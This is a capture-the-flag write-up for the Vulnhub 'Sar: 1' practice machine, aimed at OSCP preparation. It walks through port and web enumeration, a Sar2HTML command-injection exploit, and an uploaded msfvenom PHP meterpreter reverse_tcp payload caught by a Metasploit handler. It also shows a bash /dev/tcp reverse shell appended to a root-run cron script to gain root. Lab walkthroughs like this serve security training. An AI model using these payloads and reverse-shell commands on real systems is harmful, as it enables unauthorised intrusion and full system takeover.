Sar: 1

OSCP preparation

This real life like VM from vulnhub.com is a good practice for OSCP. I have found the Privilege escalation part most challenging. But this is a good practice VM and I hope this write-up will help readers.

Enumeration:

1) Host discovery: netdiscover -i eth0 -r 10.0.0.0/16 (Found IP: 10.0.2.46)

2) nmap all port scan: nmap -p- -Pn -v -T5 10.0.2.46

PORT   STATE SERVICE
80/tcp open  http

3) All port scan using masscan: masscan -p1-65535 10.0.2.46 --rate=1000 -e eth0

-p1-65535,U:1-65535 tells masscan to scan all TCP/UDP ports
--rate=1000 scan rate = 1000 packets per second
-e eth0 tells masscan to listen on the network interface for responses

This is also showing 1 port open.

4) Enumeration tool shows nothing: enum4linux -v -a 10.0.2.46

5) Default Ubuntu page showing in port 80:

6) For website directory listing: (but found nothing interesting)

gobuster dir -u http://10.0.2.46/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

===============================================================
/server-status        (Status: 403) [Size: 274]

7) Nikto scan: nikto -h http://10.0.2.46 (Here it shows some interesting info)

+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.

8) /phpinfo.php shows:

9) /robots.txt

10) There is a report upload option in this /sar2HTML page:

11) Found an exploit for Sar2HTML: exploit-db. This says, I can run command in the url.

Exploitation:

12) As command is executed via URL, so I can execute a reverse shell. I have created shell from reveshells and tried to execute but failed.

13) Creating payload using msfvenom and upload it:

msfvenom -p php/meterpreter/reverse_tcp lhost=10.0.2.42 lport=9999 f raw >sar.php

14) From previous ;ls command, I found that there is /uPLOAD directory. So to execute shell, I need to visit /sar2HTML/sarDATA/uPLOAD/sar.php

15) Metasploit handler:

msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.0.2.42
msf6 exploit(multi/handler) > set lport 9999
msf6 exploit(multi/handler) > run

Visiting the sar.php file will give a reverse connection.

16) After searching a while I have found user.txt. locate/find command do not work here.

Privilege escalation:

17) In the meterpreter session, I can not execute python shell, so I have to run 'shell' first then :python3 -c 'import pty;pty.spawn("/bin/bash")'

18) Using LinEnum to automate the enumeration. Some good place to download and run LinEnum is

/tmp
/dev/shm
/var/lock
/run/lock

This shows a huge report but not so useful.

19) Found cron jobs: cat /etc/crontab

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh

20) Inside the finally.sh - its running write.sh and I can edit the write.sh so I have added a reverse shell there:

echo "/bin/bash -c 'bash -i >& /dev/tcp/10.0.2.42/4444 0>&1' " >> write.sh

after waiting for 5 minute, I have got a root shell from my another netcat listener. Changing to root directory and I found the root.txt

Last updated 4 years ago

Was this helpful?